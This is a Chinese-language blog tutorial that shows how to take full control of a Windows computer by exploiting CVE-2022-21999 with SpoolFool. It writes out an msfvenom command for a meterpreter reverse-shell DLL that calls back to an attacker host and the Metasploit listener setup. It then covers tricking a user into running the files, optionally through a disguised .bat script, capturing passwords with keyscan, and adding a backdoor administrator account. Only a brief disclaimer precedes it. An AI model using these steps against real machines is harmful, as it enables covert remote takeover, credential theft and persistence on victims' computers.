如何通过一个exe文件远程控制整台计算机?

相关声明

以下教程仅用于hvv等专业领域,请勿以身试法。

相关阅读

我们已经分享了很多期远程控制的教程

今天我们带来一期通过一个exe文件控制整台windows电脑的教程

视频讲解

以下教程主要基于最新的CVE-2022-21999漏洞,利用Windows Print Spooler 特权提升漏洞 (LPE),在远程控制windows电脑后可以完成权限的提升,拿到管理员权限从而完整的控制计算机。

相关工具

除了本次使用到的提权工具,我们还需要配合kali linux

图文讲解

本期视频主要的两大步骤

  • 文件投递给用户
  • 通过文件进行反弹shell
图片[1]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

我们需要下载SpoolFool.exe文件,您也可以👉点这里快速访问

图片[2]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

打开链接之后,点击Download即可下载

图片[3]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

然后,我们需要使用msfvenom来创建一个恶意payload的文件来完成反弹shell

其中LHOST为你的kali linux的IP地址、LPORT为你kali linux将要监听的端口,>生成文件名可以任意,但要以.dll结尾

msfvenom -p windwos/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.0.192 LPORT=4444 >hackerloi.dll
图片[4]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

这里可以看到已经生成好了

图片[5]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

然后就可以进行投递了,这里假设用户不小心下载了这两个文件

图片[6]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

然后,我们需要在kali linux里启动metasploit渗透框架的监听器

sudo msfconsole

然后输入

use exploit/multi/handler
图片[7]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

设置我们要使用的payload

set payload windows/x64/meterpreter/reverse_tcp
图片[8]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

输入下面命令查看我们可以输入的参数

show options

这里可以看到LHOST还没有填写,因此我们需要设置一下

图片[9]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

设置LHOST为我们kali linux的IP地址

set LHOST 192.168.0.192

都设置好了,我们就可以运行了

run

现在我们只需要等待用户打开文件,就可以连上了

图片[10]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

windows用户需要在cmd里输入下面的命令(有人可能会说,用户被远控了,怎么会输入命令呢,那你也可以自己写个.bat的脚本,这里就需要大家自我发挥了,很刑的自己研究咯,我们这里只讲解最原始的)

SpoolFool.exe -dll hackerloi.dll
图片[11]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

运行完成上面的命令后,会发现提示

图片[12]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

我们回到kali linux,发现已经可以输入命令了

譬如输入sysinfo,我们就可以看到windows系统的信息了

图片[13]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

然后,我们可以输入ps查看全部进程,这里可以看到

图片[14]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

同时我们可以转移进程,我们设置4548进程来完成键盘的监听

migrate 4548
keyscan_start
图片[15]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

那么接下来用户使用键盘输入的任何字符,我们都可以看到了,譬如用户在登录浏览器时输入的用户名和密码

这里windows用户,在被控后,随便输入一个密码,12345678

图片[16]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

然后,我们在kali linux上就可以看到了

keyscan_dump
图片[17]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

是不是很神奇!这才哪儿到哪儿,如果想提升用户权限,新建一个用户到管理员组中怎么操作呢?

我们只需要在kali linux中输入对应的命令,先创建一个用户名为mrhackerloi密码为12345678的用户

net user mrhackerloi 12345678 /add
图片[18]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

然后,再给他提升用户组权限到administrator就成管理员了

net localgroup administrator mrhackerloi /add
图片[19]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

然后,回到windows,见证奇迹的时刻,你可以看到这里居然多出了一个用户,而且是管理员身份。

图片[20]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

我们可以尝试切换登录,输入密码

图片[21]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

发现成功登录上了

图片[22]-如何通过一个exe文件远程控制整台计算机?-FancyPig's blog

今天的教程你学到了吗?

© 版权声明
THE END
喜欢就支持一下吧
点赞35赞赏 分享
评论 共13条

请登录后发表评论

    • 热门评论
      FancyPig的头像-FancyPig's blog汉堡会员FancyPigLV10作者0